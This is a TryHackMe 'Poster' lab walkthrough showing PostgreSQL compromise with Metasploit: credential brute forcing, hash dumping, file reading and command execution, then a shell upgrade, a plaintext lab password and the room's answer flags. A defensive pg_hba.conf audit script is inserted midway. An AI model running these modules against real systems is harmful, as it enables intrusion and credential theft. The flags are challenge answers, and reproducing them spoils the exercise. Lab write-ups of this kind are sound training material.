Poster TryHackMe Walkthrough

Santosh Kumar


The "Poster" room focuses on web application security, specifically SQL injection, directory traversal, and file inclusion vulnerabilities. You'll learn how to identify and exploit these vulnerabilities to gain access to sensitive information.

Key Concepts

  • SQL Injection: A code injection technique that exploits a vulnerability in an application's software by manipulating SQL queries.
  • Directory Traversal: A vulnerability that allows an attacker to access directories and files stored outside the web root folder.
  • Local File Inclusion (LFI): A vulnerability that allows an attacker to include files on a server through the web browser.
  • Privilege Escalation: The act of exploiting a bug or design flaw to gain elevated access to resources that are normally protected from an application or user.

Developing a Hacker Mindset

  • Reconnaissance: Learn how to gather information about a target system, which is the first step in any penetration testing or hacking process.
  • Exploitation: Practice exploiting various vulnerabilities, which helps in understanding how attackers think and operate.
  • Privilege Escalation: Understand how to escalate privileges, a crucial skill for gaining deeper access into systems.

What is an RDBMS?

Based on E. F. Codd's relational model, an RDBMS allows users to build, update, manage, and interact with a relational database, which stores data in tables.

Today, several companies use relational databases instead of flat files or hierarchical databases to store business data. This is because a relational database can handle a wide range of data formats and process queries efficiently. In addition, it organizes data into tables that can be linked internally based on common data. This allows the user to easily retrieve one or more tables with a single query. On the other hand, a flat file stores data in a single table structure, making it less efficient and consuming more space and memory.

Most commercially available RDBMSs currently use Structured Query Language (SQL) to access the database. RDBMS structures are most commonly used to perform CRUD operations (create, read, update, and delete), which are critical to support consistent data management.

Network scanning:

I started by scanning the ports with Rustscan.


I first did network scanning with Rustscan and found open ports: SSH on 22, HTTP on 80, and PostgreSQL running on 5432.

Answer the questions below.

What is the RDBMS installed on the server?

Ans. postgresql

What port is the rdbms running on?

Ans. 5432


Then I went to the website but I didn't find anything special there.

I ran gobuster:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.10.17.168

I tried so hard but I did not get anything.

I can use Metasploit.

Metasploit contains a variety of modules that can be used to enumerate multiple RDBMSs, making it easy to gather valuable information.

Ans. no answer needed

After starting Metasploit, search for an associated auxiliary module that allows us to enumerate user credentials. What is the full path of the module (starting with auxiliary)?

Ans. auxiliary/scanner/postgres/postgres_login


Next, use Metasploit to gather login credentials. I'm going to use this module: auxiliary/scanner/postgres/postgres_login

show options

I set the RHOSTS option and ran it.

What are the credentials you found?

example: user:password

Ans. postgres:password

What is the full path of the module that allows you to execute commands with the proper user credentials (starting with auxiliary)?

Ans. auxiliary/admin/postgres/postgres_sql

use auxiliary/admin/postgres/postgres_sql
set RHOSTS <target-ip>
set PASSWORD password


Hashdump

use auxiliary/scanner/postgres/postgres_hashdump        

What is the full path of the module that allows for dumping user hashes (starting with auxiliary)?

Ans. auxiliary/scanner/postgres/postgres_hashdump

How many user hashes does the module dump?

Ans. 6

Directory Traversal/Local File Inclusion (LFI)

use auxiliary/admin/postgres/postgres_readfile        

What is the full path of the module (starting with auxiliary) that allows an authenticated user to view files of their choosing on the server?

Ans. auxiliary/admin/postgres/postgres_readfile


What is the full path of the module that allows arbitrary command execution with the proper user credentials (starting with exploit)?

Ans. exploit/multi/postgres/postgres_copy_from_program_cmd_exec

use exploit/multi/postgres/postgres_copy_from_program_cmd_exec        
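The whole chain above works only because the server accepts the postgres superuser from the network with a guessable password; a defender can catch that in pg_hba.conf before anyone logs in. The script below is an added example, not part of the original walkthrough or of any TryHackMe material: the two sample pg_hba.conf files, the appuser role and the 10.10.0.0/24 subnet are constructed, and it assumes postgres is the only superuser role.

```python
import ipaddress

# Constructed pg_hba.conf modelled on the room's misconfiguration: the 'postgres' superuser reachable from any address.
WEAK_PG_HBA = """\
local   all   all                      trust
host    all   all       127.0.0.1/32   md5
host    all   postgres  0.0.0.0/0      md5
host    all   all       ::/0           password
"""
# Hardened counterpart: superuser only over the local socket, app role from one subnet.
HARDENED_PG_HBA = """\
local   all   postgres                 peer
host    all   appuser   10.10.0.0/24   scram-sha-256
"""
SUPERUSERS = {"postgres"}  # assumption: only the default superuser role exists

def parse_pg_hba(text):
    """Yield (type, database, user, address, method); local entries have no address."""
    for raw in text.splitlines():
        f = raw.split("#", 1)[0].split()
        if f and f[0] == "local":
            yield f[0], f[1], f[2], None, f[3]
        elif f and f[0] in ("host", "hostssl", "hostnossl"):
            if len(f) >= 6 and "/" not in f[3]:      # "address netmask" form
                f[3:5] = [f[3] + "/" + f[4]]
            yield tuple(f[:5])

def is_remote(addr):
    # True when the ADDRESS column admits clients from outside this host.
    if addr is None or addr == "samehost":
        return False
    if addr in ("all", "samenet"):
        return True
    try:
        return not ipaddress.ip_network(addr, strict=False).is_loopback
    except ValueError:          # hostname we cannot resolve offline: treat as remote
        return True

def audit_pg_hba(text):
    """Return (entry, reason) pairs for entries a network attacker could abuse."""
    findings = []
    for ctype, db, user, addr, method in parse_pg_hba(text):
        entry = " ".join(x for x in (ctype, db, user, addr, method) if x)
        remote = is_remote(addr)
        if method == "trust":
            findings.append((entry, "trust: no authentication at all"))
        if remote and method == "password":
            findings.append((entry, "password: cleartext credential on the wire"))
        if remote and (user == "all" or user in SUPERUSERS):
            findings.append((entry, "superuser role reachable from the network"))
    return findings
```

Run it against the live file with `audit_pg_hba(open("/etc/postgresql/<version>/main/pg_hba.conf").read())`; an empty list means no entry exposes a superuser or skips authentication.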


python3 -c 'import pty; pty.spawn("/bin/bash")'
id        


cd /home 
ls        

I found two users here, I checked them one by one.

cd dark 
ls         

I opened dark's home directory and found a file there that contained a password.

su dark 
password:qwerty1234#!hackme        


cd /home
ls
cd alison
ls

I found user.txt but didn't have permission to read it. So I went to /var/www/html and found a file called config.php that contained a username and password.

Then I logged in as alison.

cd /home
cat user.txt


Compromise the machine and locate user.txt

Ans. THM{postgresql_fa1l_conf1gurat1on}

Escalate privileges and obtain root.txt


Ans. THM{c0ngrats_for_read_the_f1le_w1th_credent1als}



Thanks for Reading


Vrijanandan Kumar

Cyber Security Enthusiast || CTF Player || Security Researchers || Passionate about Securing the Digital World || CEH

8 months

Great work. Please continue.
